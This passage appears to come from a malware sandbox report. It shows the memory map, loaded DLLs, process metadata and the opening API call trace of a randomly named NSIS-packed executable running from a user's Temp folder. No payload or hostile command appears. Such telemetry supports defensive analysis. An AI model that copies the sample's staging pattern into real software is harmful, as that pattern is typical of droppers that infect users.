"c:\\windows\\system32\\combase.dll") Region: id = 432 start_va = 0x7ffb3cf10000 end_va = 0x7ffb3cfacfff entry_point = 0x7ffb3cf10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 433 start_va = 0x7ffb3d020000 end_va = 0x7ffb3d17bfff entry_point = 0x7ffb3d020000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 17 os_tid = 0xf98 Thread: id = 18 os_tid = 0xf9c Thread: id = 19 os_tid = 0xfa0 Thread: id = 20 os_tid = 0xfa4 Process: id = "5" image_name = "vworbzlbc.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe" page_root = "0x48ad4000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf8c" cmd_line = "\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 445 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 446 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 447 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 448 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 449 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 450 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 451 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 452 start_va = 0x400000 end_va = 0x43bfff entry_point = 0x400000 region_type = mapped_file name = "vworbzlbc.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe") Region: id = 453 start_va = 0x77190000 end_va = 0x77308fff entry_point = 0x77190000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 454 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 455 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 456 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 457 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 458 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 459 start_va = 0x7fff0000 end_va = 0x7ffb3d30ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 460 start_va = 0x7ffb3d310000 end_va = 0x7ffb3d4d1fff entry_point = 0x7ffb3d310000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 461 start_va = 0x7ffb3d4d2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb3d4d2000" filename = "" Region: id = 463 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 464 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 465 start_va = 0x5ca00000 end_va = 0x5ca72fff entry_point = 0x5ca00000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 466 start_va = 0x5ca80000 end_va = 0x5cacefff entry_point = 0x5ca80000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 467 start_va = 0x5c9f0000 end_va = 0x5c9f7fff entry_point = 0x5c9f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 468 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 469 start_va = 0x75f20000 end_va = 0x76095fff entry_point = 0x75f20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 470 start_va = 0x76bc0000 end_va = 0x76caffff entry_point = 0x76bc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 471 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 472 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 473 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 474 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 475 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 476 start_va = 0x738f0000 end_va = 0x73af8fff entry_point = 0x738f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 477 start_va = 0x74230000 end_va = 0x74288fff entry_point = 0x74230000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 478 start_va = 0x74290000 end_va = 0x74299fff entry_point = 0x74290000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 479 start_va = 0x742a0000 end_va = 0x742bdfff entry_point = 0x742a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 480 start_va = 0x74500000 end_va = 0x7463ffff entry_point = 0x74500000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 481 start_va = 0x74640000 end_va = 0x74729fff entry_point = 0x74640000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 482 start_va = 0x74760000 end_va = 0x75b1efff entry_point = 0x74760000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 483 start_va = 0x75b80000 end_va = 0x75c3dfff entry_point = 0x75b80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 484 start_va = 0x75c40000 end_va = 0x75c83fff entry_point = 0x75c40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 485 start_va = 0x75d40000 end_va = 0x75dbafff entry_point = 0x75d40000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 486 start_va = 0x75dc0000 end_va = 0x75e03fff entry_point = 0x75dc0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 487 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 488 start_va = 0x760a0000 end_va = 0x760e2fff entry_point = 0x760a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 489 start_va = 0x76280000 end_va = 0x7630cfff entry_point = 0x76280000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 490 start_va = 0x764d0000 end_va = 0x769acfff entry_point = 0x764d0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 491 start_va = 0x769b0000 end_va = 0x76afcfff entry_point = 0x769b0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 492 start_va = 0x76cf0000 end_va = 0x76ea9fff entry_point = 0x76cf0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 493 start_va = 0x76eb0000 end_va = 0x76ebbfff entry_point = 0x76eb0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 494 start_va = 0x77050000 end_va = 0x7705efff entry_point = 0x77050000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 495 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 496 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 497 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 498 start_va = 0x690000 end_va = 0x817fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 499 start_va = 0x74730000 end_va = 0x7475afff entry_point = 0x74730000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 500 start_va = 0x77070000 end_va = 0x7718ffff entry_point = 0x77070000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 501 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 502 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 503 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 504 start_va = 0x820000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 505 start_va = 0x9b0000 end_va = 0x1daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 506 start_va = 0x74110000 end_va = 0x74184fff entry_point = 0x74110000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 507 start_va = 0x1db0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 508 start_va = 0x73700000 end_va = 0x73718fff entry_point = 0x73700000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 509 start_va = 0x74350000 end_va = 0x744f4fff entry_point = 0x74350000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 510 start_va = 0x76cb0000 end_va = 0x76ce5fff entry_point = 0x76cb0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 511 start_va = 0x74190000 end_va = 0x74220fff entry_point = 0x74190000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 512 start_va = 0x732c0000 end_va = 0x73401fff entry_point = 0x732c0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 513 start_va = 0x763b0000 end_va = 0x76441fff entry_point = 0x763b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 514 start_va = 0x740f0000 end_va = 0x7410cfff entry_point = 0x740f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 515 start_va = 0x73260000 end_va = 0x732b2fff entry_point = 0x73260000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 516 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x2e0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 517 start_va = 0x742c0000 end_va = 0x74341fff entry_point = 0x742c0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 518 start_va = 0x73d50000 end_va = 0x73d57fff entry_point = 0x73d50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 519 start_va = 0x73250000 end_va = 0x73255fff entry_point = 0x73250000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 520 start_va = 0x300000 end_va = 0x303fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 521 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 522 start_va = 0x1ee0000 end_va = 0x2216fff entry_point = 0x1ee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 523 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 524 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 525 start_va = 0x1db0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 526 start_va = 0x1ed0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 527 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 528 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 529 start_va = 0x340000 end_va = 0x343fff entry_point = 0x340000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 530 start_va = 0x3c0000 end_va = 0x3e1fff entry_point = 0x3c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000012.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db") Region: id = 531 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 532 start_va = 0x2220000 end_va = 0x2a2afff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 533 start_va = 0x340000 end_va = 0x342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 534 start_va = 0x10000000 end_va = 0x10005fff entry_point = 0x10000000 region_type = mapped_file name = "system.dll" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll") Region: id = 535 start_va = 0x540000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 536 start_va = 0x2a30000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 537 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 538 start_va = 0x2b30000 end_va = 0x8a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 539 start_va = 0x1eb0000 end_va = 0x1ec1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 540 start_va = 0x73230000 end_va = 0x73242fff entry_point = 0x73230000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 541 start_va = 0x736e0000 end_va = 0x736fafff entry_point = 0x736e0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 542 start_va = 0x73200000 end_va = 0x7322efff entry_point = 0x73200000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 543 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 562 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 563 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 564 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 565 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 566 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 567 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 569 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 570 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 571 start_va = 0x3f0000 end_va = 0x3fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 572 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 573 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 574 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 575 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 581 start_va = 0x8a90000 end_va = 0x8c06fff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 582 start_va = 0x8c10000 end_va = 0x8d88fff entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Thread: id = 22 os_tid = 0xfb0 [0028.330] SetErrorMode (uMode=0x8001) returned 0x0 [0028.330] GetVersion () returned 0x2800000a [0028.332] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76bc0000 [0028.332] GetProcAddress (hModule=0x76bc0000, lpProcName="SetDefaultDllDirectories") returned 0x76050790 [0028.332] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0028.332] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0028.332] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0028.332] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x74110000 [0028.563] lstrlenA (lpString="UXTHEME") returned 7 [0028.563] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0028.563] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0028.563] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x73700000 [0028.677] lstrlenA (lpString="USERENV") returned 7 [0028.677] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0028.677] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0028.677] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74350000 [0028.964] lstrlenA (lpString="SETUPAPI") returned 8 [0028.964] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0028.964] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0028.964] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x74190000 [0029.113] lstrlenA (lpString="APPHELP") returned 7 [0029.113] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.113] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0029.113] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x732c0000 [0029.410] lstrlenA (lpString="PROPSYS") returned 7 [0029.410] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.410] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0029.410] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x740f0000 [0029.517] lstrlenA (lpString="DWMAPI") returned 6 [0029.517] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.517] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0029.517] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74290000 [0029.517] lstrlenA (lpString="CRYPTBASE") returned 9 [0029.517] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.517] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\OLEACC.dll") returned 11 [0029.517] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x73260000 [0029.667] lstrlenA (lpString="OLEACC") returned 6 [0029.667] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.667] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0029.667] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x742c0000 [0029.765] lstrlenA (lpString="CLBCATQ") returned 7 [0029.765] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0029.765] GetSystemDirectoryA (in: lpBuffer=0x19fcb4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.765] wsprintfA (in: param_1=0x19fcc7, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0029.765] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x73d50000 [0029.814] GetProcAddress (hModule=0x73d50000, lpProcName="GetFileVersionInfoA") returned 0x73d51f80 [0029.814] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0029.814] GetSystemDirectoryA (in: lpBuffer=0x19fcb4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0029.814] wsprintfA (in: param_1=0x19fcc7, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0029.814] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x73250000 [0029.819] GetProcAddress (hModule=0x73250000, lpProcName="SHGetFolderPathA") returned 0x73251300 [0029.819] InitCommonControls () [0029.819] OleInitialize (pvReserved=0x0) returned 0x0 [0029.843] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fe24, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x19fe24) returned 0x1 [0029.867] lstrcpynA (in: lpString1=0x422f20, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0029.867] GetCommandLineA () returned="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" [0029.867] lstrcpynA (in: lpString1=0x429000, lpString2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", iMaxLength=1024 | out: lpString1="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") 